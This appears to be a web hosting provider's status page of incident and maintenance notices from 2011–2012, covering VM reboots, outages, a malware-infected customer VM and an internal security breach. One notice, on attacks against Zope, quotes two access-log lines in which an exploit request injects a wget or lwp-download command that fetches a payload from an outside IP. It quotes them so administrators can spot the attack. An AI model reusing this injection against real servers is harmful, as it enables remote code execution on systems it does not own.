Saturday, 2012-03-03 22:00 CET: Restart of all VMs due to security update

We need to perform a security update on our VM hosts which requires a restart of all virtual machines.

The restart will be performed beginning from Saturday, 2012-03-03 22:00 CET and will require about 4 hours until all VMs will have been rebooted. Reboot time of individual VMs may vary a lot depending on the need of performing a file system check. We expect most VMs to reboot within 10-20 minutes.

For details about the security issue, see http://www.gentoo.org/security/en/glsa/glsa-201202-09.xml).

Please excuse the short notice, according to our security policy we strive to install relevant updates as quickly as possible to minimize impact of known issues.

Connectivity issues 2012-01-29 (4:43pm-5:25pm CET)

From 4:43pm to 5:25pm CET we experienced high package loss on our upstream connection to the data center.

The cause of this was a malware infestation on a customer VM. No infrastructure components appear to have been compromised.

Connectivity has been reliable again since stopping the malware process.

The affected VM has been stopped and we are in contact with the customer to resolve the issue.

Maintenance for mail.gocept.net at 2012-01-04 22:00–23:00 CET

A maintenance window for mail.gocept.net services is scheduled for Wednesday 2012-01-04 between 22:00 and 23:00 CET. Please note that during this period, the mail server mail.gocept.net will be offline.

Customer VMs will not be affected directly but VMs using mail.gocept.net as relay might experience mail delivery delays. No mail will be lost.

This maintenance includes disk capacity upgrades.

Attacks against Zope installations

We see intensified attack activity against Zope installations since 2011-12-26. The activity focuses on automatically exploiting the vulnerability described in CVE-2011-3587, for which a patch is readily available.

Please ensure that all of your Zope installations contain the latest security patches, since gocept does not take responsibility for patching user applications.

Suspicious activity leaves traces in access log files that follow a pattern like:

211.191.168.XXX - - [26/Dec/2011:22:18:00 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
211.191.168.XXX - - [26/Dec/2011:22:18:01 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=lwp-download%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

Hardware failure of a VM server

On Monday, 2011-10-31 one of our VM servers died completely. This caused an unplanned outage for several customer VMs and our mail server mail.gocept.net. We were able to limit the total down times by migrating the affected VMs to other servers quickly.
It is unlikely that any data has been lost. Please excuse the service disruption.

The server started to decline network requests around 15:30 CET. Our stand-by support team was alerted immediatly. After we had come to the conclusion that we could not revive the hardware quickly, we began on 16:15 CET to move VMs to other Servers. Around 16:45 CET services have been functional again.

Security breach on an internal system on 2011-10-18

On Tuesday (2011-10-18) at 22:45 CEST an attacker managed to gain access to one of our internal systems running, among others, the external service monitoring, the Redmine project management tool, and an internal mailing list server. The compromised system is not automatically managed.

Customer VMs were not affected.

We needed to take the machine partially off the network between Wednesday (2011-10-19) 13:20 and 21:00 CEST to perform an analysis and fix security holes. The above mentioned services had only limited availability during this period. User-generated data has most likely not been compromised. We decided to take the machine back online to make the services available again as quickly as possible.

Nevertheless we will move the services to newly installed machines shortly and erase the compromised machine. We will review and improve our security practices to avoid similar incidents in the future.

Unplanned VM outage 2011-09-06 16:25-17:00 CEST

Unfortunately some VMs experienced an unplanned outage yesterday (2011-09-05) between 16:25 and 17:00 CEST as their root disks  turned read-only.

To quickly recover from this state we forcedly shut down the VMs and rebooted the associated KVM server. The VMs recovered fine after this reboot.

Owners of affected VMs have been notified individually directly after the incident.

It appears that we have hit a bug in our iSCSI initialisation code that caused all VMs on this physical host to loose connectivity to their storage server.

The issue was triggered while we were bootstrapping a new virtual machine.

The bug is currently undergoing further analysis and replication in our development environment and will be fixed soon.

For the time being we have ceased to perform actions that trigger this bug and do not expect your VM to be affected from this again.